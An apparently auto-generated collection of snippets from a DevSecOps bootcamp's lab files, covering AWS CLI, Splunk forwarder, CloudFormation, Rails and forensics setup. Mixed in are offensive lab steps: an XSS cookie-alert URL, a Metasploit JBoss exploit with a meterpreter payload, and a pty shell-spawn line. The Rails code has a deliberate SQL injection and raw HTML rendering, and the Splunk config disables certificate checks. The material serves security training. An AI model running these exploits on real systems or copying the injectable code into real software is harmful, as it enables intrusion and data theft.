.*) . *"
| rex field=cmd "s/+/ /g"
```
--------------------------------
### Selfie Command Usage
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-2.md
Displays the available options and usage instructions for the Selfie command-line tool. Use this to understand how to configure and run Selfie.
```bash
$ selfie
Usage: selfie [options]
-r, --region REGION AWS Region (default: us-west-2)
-a, --target-account ACCOUNT Target AWS account to snapshot, without dashes
-R, --target-role ROLE Incident response target account role name
-n INSTANCEID, Comma-separated list of instances to snapshot
--target-instance-list
-i, --ir ACCOUNT The incident response (IR) account to copy snapshots into
-A, --control-account ACCOUNT The control plane account number
-c, --control-role ROLE Incident response control account role name
-u, --username USERNAME Your IAM username, used to grab MFA serial number
-t, --ticket-id TICKETID The ticket ID, will be added to snapshot description
-f, --file-path FILEPATH The file path to load and resume from
-p, --profile-name NAME The AWS credentials profile name
-b, --bucket BUCKET The bucket in incident response account for saving security configuration
-h, --help Show this message
--version Show version
```
--------------------------------
### SSH into Vagrant Virtual Machine
Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md
Connects to the Vagrant virtual machine via SSH. If AWS configuration is missing, running 'vagrant provision' may resolve the issue by executing additional setup commands.
```bash
vagrant ssh
```
```bash
vagrant provision
```
--------------------------------
### Download, Decompress, and Count Words
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md
Demonstrates downloading a compressed word list, organizing it into a directory, decompressing, and counting the total words.
```bash
$ wget http://download.openwall.net/pub/wordlists/all.gz
$ mkdir words
$ mv all.gz words/
$ cd words
$ gunzip all.gz
$ ls -l
$ wc -l all
```
--------------------------------
### Automate AWS Role Assumption
Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/ASSIGNMENTS.md
Use the 'assumer' gem to automate assuming an AWS role into a target account and opening the AWS Console UI. Ensure the 'assumer' gem is installed and necessary AWS credentials/variables are configured.
```bash
assumer -a 717986480831 -r human/dso/TGT-dso-DeploymentAdmin -A 100352119871 -R dso/ctrl/my-app/CTL-my-app-DeploymentAdmin -o dso -g -u $AWS_USERNAME
```
--------------------------------
### XSS Attack URL Example
Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-1.md
This URL demonstrates an XSS attack by embedding JavaScript within the 'url' parameter. It is designed to execute an alert box showing document cookies. Note that browser compatibility may vary.
```url
http://127.0.0.1/?url=%2Fdashboard%2Fhome#test=%3Cscript%3Ealert(document.cookie)%3C/script%3E
```
--------------------------------
### Configure UserData for Proxy Support
Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md
Add export commands for http_proxy and https_proxy to the UserData script. Ensure these variables are loaded on login by appending them to .bash_profile and configuring git.
```bash
#!/bin/bash -xe
export http_proxy=http://proxy:3128
export https_proxy=http://proxy:3128
rpm -ivh https://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-7.noarch.rpm
yum -y install git git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel
yum -y install nodejs mariadb mariadb-server mariadb-devel
systemctl enable mariadb.service
systemctl start mariadb.service
rpm -ivh https://s3-us-west-2.amazonaws.com/dso-public-bucket/ruby-2.3.1-1.el7.x86_64.rpm
cd /home/ec2-user
echo "export GEM_HOME=~/.gem" >> .bash_profile
echo "export GEM_PATH=~/.gem" >> .bash_profile
echo "export RAILS_ENV=mysql" >> .bash_profile
echo "export PATH=~/.gem/bin:$PATH" >> .bash_profile
echo "export http_proxy=http://proxy:3128" >> .bash_profile
echo "export https_proxy=http://proxy:3128" >> .bash_profile
echo "export no_proxy=localhost,127.0.0.1,254.169.254.169" >> .bash_profile
echo "[http]
proxy = $http_proxy" >> .gitconfig
chown ec2-user: .gitconfig
su -l -c "git clone https://github.com/OWASP/railsgoat.git" ec2-user
su -l -c "gem install bundler" ec2-user
su -l -c "cd railsgoat && bundle install && bundle exec rake db:setup" ec2-user
su -l -c "cd railsgoat && bundle exec rails server -b 0.0.0.0 -p 8080 &" ec2-user
```
--------------------------------
### Attempt to Create File as Non-Privileged User
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md
Tries to create a file in the /etc directory as a regular user to demonstrate permission restrictions.
```bash
$ touch /etc/myfile.txt
```
--------------------------------
### Create New Rails Application
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md
Creates a new Rails application named 'myapp' with specific configurations, including MySQL database support and skipping certain Rails features.
```bash
$ rails new --skip-turbolinks --skip-spring \
--skip-test-unit -d mysql \
myapp
```
--------------------------------
### Create AWS IAM Access Keys
Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-3.md
Create API access keys for the newly created IAM user.
```bash
$ aws iam create-access-key --user-name hacker1
```
--------------------------------
### Upload Configuration to S3
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/LESSON-1.md
Upload collected configuration files to an S3 bucket for secure storage and analysis.
```bash
aws s3 cp instance-config.json s3://your-forensic-bucket/instance-config.json
aws s3 cp iam-users.json s3://your-forensic-bucket/iam-users.json
aws s3 cp iam-roles.json s3://your-forensic-bucket/iam-roles.json
aws s3 cp iam-policies.json s3://your-forensic-bucket/iam-policies.json
```
--------------------------------
### Check Current User and List Files
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md
Commands to determine the current logged-in user and list files in the home directory with all details.
```bash
$ whoami
$ ls -la
```
--------------------------------
### Display Raw Description in View
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md
Modifies the show view for bootcamps to render the description field using the `raw` helper, which bypasses HTML escaping.
```erb
Description:
<%=raw @bootcamp.description %>
```
--------------------------------
### Verify AWS CLI Configuration
Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/ASSIGNMENTS.md
Run this command to verify that your AWS CLI is configured correctly and can connect to the AWS API. It should return an empty table if successful.
```bash
aws ec2 describe-instances --output table --region us-west-2
```
--------------------------------
### Configure Splunk Inputs
Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md
Configure Splunk Universal Forwarder to monitor log directories for new data. It includes settings for the default host and monitoring specific log paths.
```bash
echo "[default]
host = \$decideOnStartup
[monitor:///home/ec2-user/railsgoat/log/]
recursive=true
[monitor:///var/log/]
recursive=true" | sudo tee /opt/splunkforwarder/etc/system/local/inputs.conf
```
--------------------------------
### Inspect File Permissions
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md
Shows detailed information about the 'ls' command file, including its permissions, owner, and size.
```bash
$ ls -l /bin/ls
-rwxr-xr-x. 1 root root 117616 Feb 16 10:49 /bin/ls
```
--------------------------------
### Lab 1 Outline
Source: https://github.com/devsecops/bootcamp/blob/master/Week-8/LESSON-1.md
This snippet outlines the general structure or steps for Lab 1.
```text
*
*
*
*
*
```
--------------------------------
### Log in to AWS with Assumer
Source: https://github.com/devsecops/bootcamp/blob/master/Week-4/labs/LAB-1.md
Use the 'assumer' tool to log into the target AWS account. Ensure the AWS_USERNAME environment variable is set to your student ID.
```bash
$ unset AWS_SESSION_TOKEN AWS_SECRET_ACCESS_KEY AWS_ACCESS_KEY_ID
$ assumer -a 717986480831 -r human/dso/TGT-dso-DeploymentAdmin \
-A 100352119871 -R dso/ctrl/my-app/CTL-my-app-DeploymentAdmin \
-o dso -g -u $AWS_USERNAME
```
--------------------------------
### Configure AWS CLI
Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md
This command initiates the AWS CLI configuration process. It prompts for access key ID, secret access key, default region, and output format.
```bash
aws configure
```
--------------------------------
### List Partitions on Attached Disk
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md
Use fdisk to list partitions on a newly attached disk. Replace with the appropriate device ID for the disk (e.g., /dev/xvdf).
```bash
sudo fdisk -l
```
--------------------------------
### Display System Usernames
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md
Shows the contents of the /etc/passwd file, which contains user account information.
```bash
$ cat /etc/passwd
```
--------------------------------
### Configure Splunk Outputs
Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md
Configure Splunk Universal Forwarder to send data to a specified server and port. This includes settings for SSL and server certificate verification.
```bash
echo "[tcpout]
defaultGroup = dso-autolb-group
[tcpout:dso-autolb-group]
disabled = false
dropEventsOnQueueFull = 10
server = appliance:9997
sslCertPath = \$SPLUNK_HOME/etc/auth/server.pem
sslPassword = password
sslRootCAPath = \$SPLUNK_HOME/etc/auth/cacert.pem
sslVerifyServerCert = false
useACK = false" | sudo tee /opt/splunkforwarder/etc/system/local/outputs.conf
```
--------------------------------
### SSH into Bastion Instance
Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md
Connects to the bastion instance using SSH with agent forwarding enabled. Use `-A` to pass your SSH key. Verify key presence with `ssh-add -l`.
```bash
ssh -A student1@52.x.x.x
```
--------------------------------
### Implement Search in Index Action
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md
Adds search functionality to the `index` action of the `bootcamps` controller. It filters bootcamps by name if a search parameter is provided.
```ruby
def index
@bootcamps = Bootcamp.all
if params[:search].to_s != ''
@bootcamps = Bootcamp.where("name LIKE '%#{params[:search]}%'”)
else
@bootcamps = Bootcamp.all
end
end
```
--------------------------------
### Trace Execution of a Custom Binary
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md
Uses `strace` to trace the system calls made by a custom binary, revealing its behavior such as opening network ports.
```bash
strace /mnt//jenkins/tmp/si8xE3
```
--------------------------------
### SSH into Application Instance
Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md
Connects to the application instance from the bastion using SSH. Assumes default user `ec2-user`.
```bash
ssh ec2-user@10.0.0.x
```
--------------------------------
### Connect to EC2 Instance
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md
Connect to your AWS EC2 instance using SSH with a specified private key.
```bash
ssh -i ~/Downloads/jg.pem ec2-user@54.x.x.x
```
--------------------------------
### CloudFormation Launch Configuration Resource
Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md
Defines a Launch Configuration for an Auto Scaling Group. This specifies the instance details, including security groups, AMI, instance type, and key pair.
```json
"WebServerInstance": {
"Type": "AWS::AutoScaling::LaunchConfiguration",
"Properties": {
"SecurityGroups": [
{
"Ref": "AppSecurityGroup"
}
],
"ImageId": {
"Ref": "AmiId"
},
"InstanceType": {
"Ref": "InstanceType"
},
"KeyName": {
"Ref": "KeyName"
},
"UserData": {
...
}
}
}
```
--------------------------------
### Basic CloudFormation Template Structure
Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-1.md
This snippet shows the minimum required sections for a CloudFormation template: AWSTemplateFormatVersion, Description, Parameters, Resources, and Outputs.
```json
{
"AWSTemplateFormatVersion": "2010-09-09",
"Description": "...",
"Parameters": {
},
"Resources": {
},
"Outputs": {
}
}
```
--------------------------------
### Lab #2 Outline
Source: https://github.com/devsecops/bootcamp/blob/master/Week-8/LESSON-2.md
This snippet outlines the key components or steps for Lab #2. It is presented as a list.
```text
*
*
*
*
*
```
--------------------------------
### List Jenkins User Home Directory Contents
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md
Lists all files and directories within the Jenkins user's home directory.
```bash
ls -a /mnt//jenkins/var/lib/jenkins
```
--------------------------------
### AWS CLI Configuration Prompt
Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md
This is the expected interactive prompt when configuring the AWS CLI. Fill in your AWS credentials and desired region/format.
```text
AWS Access Key ID [None]:
AWS Secret Access Key [None]:
Default region name [None]:
Default output format [None]:
```
--------------------------------
### Create and Count Words in a Text File
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md
Creates a new text file using 'cat' and then counts the words within it. Press Ctrl+D to finish input.
```bash
$ cat > file.txt
this is my file, there are many like it but this one is mine...
^D
```
--------------------------------
### Set Root Route
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md
Sets the root route of the application to the index action of the bootcamps controller.
```ruby
root 'bootcamps#index'
```
--------------------------------
### Display Network Information
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md
Shows network interface configuration (ifconfig), routing table (route), and network connections (netstat).
```bash
$ ifconfig
$ route
$ netstat -na
```
--------------------------------
### Clone Selfie Repository
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-2.md
Clone the Selfie tool's Git repository to your local machine to begin the automation process.
```bash
$ git clone https://github.com/devsecops/selfie.git
```
--------------------------------
### Gather IAM Configuration
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/LESSON-1.md
Collect IAM configuration details using AWS CLI. This helps in understanding user permissions and policies.
```bash
aws iam list-users --region us-east-1 > iam-users.json
aws iam list-roles --region us-east-1 > iam-roles.json
aws iam list-policies --region us-east-1 > iam-policies.json
```
--------------------------------
### View Jenkins Auth Log
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md
Displays the Jenkins authentication log to review system user activity.
```bash
sudo cat /mnt//jenkins/var/log/auth.log
```
--------------------------------
### Add Search Form to Index View
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md
Adds a search form to the `index` view for bootcamps, allowing users to input search terms.
```erb
Search
<%= form_tag(bootcamps_path, method: "get", id: "search-form") do %>
<%= text_field_tag :search, params[:search], placeholder: "Search Bootcamps" %>
<%= submit_tag "Search Bootcamps"%>
<% end %>
Listing Bootcamps
```
--------------------------------
### Upload Configuration Files to S3
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-1.md
Iterate through all JSON files in the current directory and upload them to the specified S3 bucket using the AWS CLI. This command is used to store collected forensic data.
```bash
for FILE in `ls *.json`; do
aws s3 cp $FILE s3://dso-bootcamp-forensics/student1/
done
```
--------------------------------
### Spawn Bash Shell
Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-3.md
Use this Python command to spawn an interactive bash shell after gaining initial access.
```bash
> shell
python -c 'import pty; pty.spawn("/bin/bash")'
[ec2-user@ip-10-0-2-43 jboss-5.1.0.GA]$ cd ~
```
--------------------------------
### List Stacks with Restacker
Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-3.md
Command to list all current stacks managed by Restacker for a specific application and user context.
```bash
$ restacker list -l myapp -u student1 -c dso
```
--------------------------------
### Exploit JBoss DeploymentFileRepository WAR Deployment
Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-2.md
Configure and run the JBoss DeploymentFileRepository WAR Deployment exploit. Set the target host, exploit target, payload, and listener port (LPORT) based on your student ID.
```bash
> use exploit/multi/http/jboss_invoke_deploy
> set RHOST 10.0.6.165
> set target 1
> set payload java/meterpreter/bind_tcp
> set LPORT 10001
> exploit
```
--------------------------------
### Configure AWS CLI Profile
Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-1.md
Configure AWS CLI with access keys and a default region for a specific profile. This is typically done after downloading credentials.
```bash
aws configure --profile dso
AWS Access Key ID [None]:
AWS Secret Access Key [None]:
Default region name [None]: us-west-2
Default output format [None]: json
```
--------------------------------
### Create AWS IAM User
Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-3.md
Create a new IAM user and group in AWS, matching your student ID.
```bash
$ aws iam create-user --user-name hacker1
$ aws iam create-group --group-name hacker1
$ aws iam add-user-to-group --group-name hacker1 --user-name hacker1
```
--------------------------------
### Configure Splunk Outputs
Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-3.md
Configures the Splunk Universal Forwarder to send logs to a specified server group.
```bash
"echo \"[tcpout]\n",
"defaultGroup = dso-autolb-group\n",
"\n",
"[tcpout:dso-autolb-group]\n",
"disabled = false\n",
"dropEventsOnQueueFull = 10\n",
"server = appliance:9997\n",
"sslCertPath = \\\$SPLUNK_HOME/etc/auth/server.pem\n",
"sslPassword = password\n",
"sslRootCAPath = \\\$SPLUNK_HOME/etc/auth/cacert.pem\n",
"sslVerifyServerCert = false\n",
"useACK = false\" >> /opt/splunkforwarder/etc/system/local/outputs.conf\n"
```